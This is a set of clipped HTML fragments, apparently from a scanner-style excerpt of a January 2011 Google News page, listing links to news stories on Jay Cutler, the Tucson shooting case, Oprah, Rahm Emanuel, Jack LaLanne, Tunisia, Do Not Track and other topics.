<div class="thumbnail" style=""><a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/24/lovie-smith-defends-an-embattled-cutler/" class="usg-AFQjCNEoK7XAsUriosQ-J5zCXObULpccGA " title="New York Times (blog)"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/4Qx6t9NgLfRlrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/24/lovie-smith-defends-an-embattled-cutler/" class="usg-AFQjCNEoK7XAsUriosQ-J5zCXObULpccGA "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNExCKBurSTO2CpunscBMXRB8AS8rg " href="http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://sports.espn.go.com/chicago/nfl/news/story?id=6054809" target="_blank" class="usg-AFQjCNGOcyfxN0x_yhl1C7G2kN9X2Uvebw " id="MAA4AEgDUAFgAmoCdXM">A closer look at Jay Cutler's knee injury</a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1" target="_blank" class="usg-AFQjCNHjzljR480WHVLDV2GFli4gPC1ywg " id="MAA4AEgDUAJgAmoCdXM">Duke's Coach K says Chicago Bears QB Jay Cutler should support team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGk8jkGEv1Mwau1rxJflyTxLLTyLQ " href="http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhT_d3vHMRaBJkdkY1C3b7vZZrJg " href="http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamyU16jAdCMJDs5ZkpwKdiXpkGw " href="http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2WdPyyjmLcRZK_1AY0NI8Eu5RwA " href="http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html" id="MAA4AEgDUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/T-Xfzw4FP6yhAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " id="MAA4AEgEUAFgAmoCdXM">Suspect Pleads Not Guilty in Tucson Shooting</a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000" target="_blank" class="usg-AFQjCNHFSESne1W6NZKJuevUCkqaTiP9mg " id="MAA4AEgEUAJgAmoCdXM">Accused Tucson Gunman Jared Loughner Smiles Through Hearing</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNElebFTmOpQ7wKik8gpIXpP1selVQ " href="http://www.9and10news.com/Category/Story/?id=279641&cID=3" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEOK7cyGOy-zN-41xid_LtEjydG4Q " href="http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFSXfhjHN0rS0rdJf8PBDheYe6-rQ " href="http://mystateline.com/fulltext-news/?nxd_id=223216" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF-e3D8cBL-34zlHFtAKxTJkVxrjQ " href="http://www.ny1.com/content/news_beats/politics/132719/suspect-in-arizona-shooting-pleads-not-guilty/Default.aspx" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA " title="CBC.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEhLfkwP3KHv_AxKWphB2eFXVLo4w " href="http://www.people.com/people/article/0,,20460315,00.html" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=1wbQ-zmLKqg">Video: 
Oprah Reveals Her Big Family Secret
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://chicago.gopride.com/news/article.cfm/articleid/16138036" target="_blank" class="usg-AFQjCNHLM73pKjVmbSYzUIkwM-YRizRjZA " id="MAA4AEgFUAFgAmoCdXM">Oprah's Big Secret: Ooooo or zzzzzz?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHu4Y7lCPXQJ2lc2u8sbaHH6Tfs7w " href="http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1" id="MAA4AEgFUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIUkZzAs9Y61wWQ3duZpRqiJx8Gg " href="http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4hVZx0KyfMaR7DUadFRt5fLq5aA " href="http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8lkOCVmQaNBIQdhaM5ui-PusAEw " href="http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog " title="Globe and Mail"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/gsPtXlmrvQGLtM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGJtokXRbLsVUlXcHg5zkA1i0nTdg " href="http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=A1JzTAhSoKA">Video: 
Emanuel Has 'No Doubt' He'll Win Ballot Fight
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race" target="_blank" class="usg-AFQjCNHviaETBQQ4CbFKFWhs-WtpR5QLaA " id="MAA4AEgGUAFgAmoCdXM">Rahm Emanuel ruling: big setback at a crucial time in Chicago mayor's race</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwKQiOZfU8EiZQoS5g2nyEQ2IkLQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH1n08b9Ozqew6hXKq2BX3LBSlusw " href="http://www.bloomberg.com/news/2011-01-24/emanuel-says-no-doubt-illinois-high-court-will-reverse-ruling-on-ballot.html" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110124/jack-lalanne-remembered-110124/" class="usg-AFQjCNEqPf2jo0bh-NTnwGk18mUUjIJQSA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/eBjIWpZWD7cpIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110124/jack-lalanne-remembered-110124/" class="usg-AFQjCNEqPf2jo0bh-NTnwGk18mUUjIJQSA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHGP9SsjzyW62sRmc_IObJzTshL0g " href="http://www.mercurynews.com/breaking-news/ci_17184991" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Video: 
Fitness Guru Jack LaLanne Dead at 96
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story" target="_blank" class="usg-AFQjCNF2h3Ezfm1HF14DqaqR8JY12OIJCg " id="MAA4AEgHUAFgAmoCdXM">Jack LaLanne dies at 96; spiritual father of US fitness movement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUvbbz0ZsETsJAmVKDjwuHSZcMQ " href="http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFY9XEVCdovnm3JUC4ZmzWPDVoZqw " href="http://www.catholic.org/ae/celebrity/story.php?id=40071" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH3k-EVRZWMzJLRjpI1Ql1ccGWDqw " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012403521.html" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGf__nmauUuSabbP9kk2SvRT05zrg " href="http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7" target="_blank" class="usg-AFQjCNHXjZjZZ9wZ1CQDlom-nLlng-eGZQ " id="MAA4AEgIUAFgAmoCdXM">Army Leader Guarantees Stability in Tunisia</a>
...[SNIP]...
<div class="aa-inner"><a href="http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/" target="_blank" class="usg-AFQjCNHRMMEdervYw4C3TrR4yaH527g-LA " id="MAA4AEgIUAJgAmoCdXM">Family of deposed Tunisian president reportedly flees to Canada</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGfbz26qP-4kIHs7Cs4zetWEFMGQg " href="http://www.reuters.com/article/idUSTRE70N4AE20110124" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd1p9S1P917IJX6_NsO7fub3yJQg " href="http://allafrica.com/stories/201101242014.html" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHBQ6i08N55rvq2OZdEmGRrU9lJbg " href="http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIRtGWiZ24XajWlPE7P_ytLx4u3w " href="http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA " title="Zee News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zeenews.com/news682964.html" class="usg-AFQjCNGjuhLYOwwQDWERwWa00agiriIpeA "> Zee News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGE1VkAeO99EDIU5V2VTdJDt90ETw " href="http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376185,00.asp" target="_blank" class="usg-AFQjCNGZP7c0Zl6lnVgm4bMy_QmQ4_9spA " id="MAA4AEgJUAJgAmoCdXM">Tracking Should Be Abolished</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMvJiGe2AX0noQzS6SakNvosEsRw " href="http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH2Ail2CEz7JI11eKLrtWgI-nzRPQ " href="http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHmUD0OklmTxR-5BKg01tb_AruD4A " href="http://www.computerworld.com/s/article/9206061/Google_jumps_into_Do_Not_Track_debate_with_Chrome_add_on?taxonomyId=84" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5ZW20110124" class="usg-AFQjCNH7STnOQPGVSySyMeBzJftacyPLLg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNElKv0GNcBZgzUQCULJE3OQ6oz6jw " href="http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Id_W6wgEIGo">Video: 
Palestine Papers spark fury in Ramallah
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " id="MAA4AEgKUAFgAmoCdXM">Papers reveal how Palestinian leaders gave up fight over refugees</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgKUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEV93objFvHJXFeDa0meWiOJcehyw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA " title="Bizjournals.com"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html" class="usg-AFQjCNFlkgnxLOGOIFyBSsT-ZZz8lmH1PA "> Bizjournals... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFJ_Gs52Mso4Rmc8202BGU0W2_L6Q " href="http://www.reuters.com/article/idUSTRE70N6Q420110124" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNHfGkJgRqTwQFW4jGNECzdb_053bw " id="MAA4AEgLUAFgAmoCdXM">Smurfit Options Trades Raise Analyst Brows</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN" target="_blank" class="usg-AFQjCNEjjwBXv_sJbLEN9ftV5HG1BzLX7g " id="MAA4AEgLUAJgAmoCdXM">McRib, Smurfit-Stone: Hot Trends</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgMUAFgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgMUAJgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgNUAFgAmoCdXM">Lowering BP Can Help Cut Women's Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgNUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&srvc=rss" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgOUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgOUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
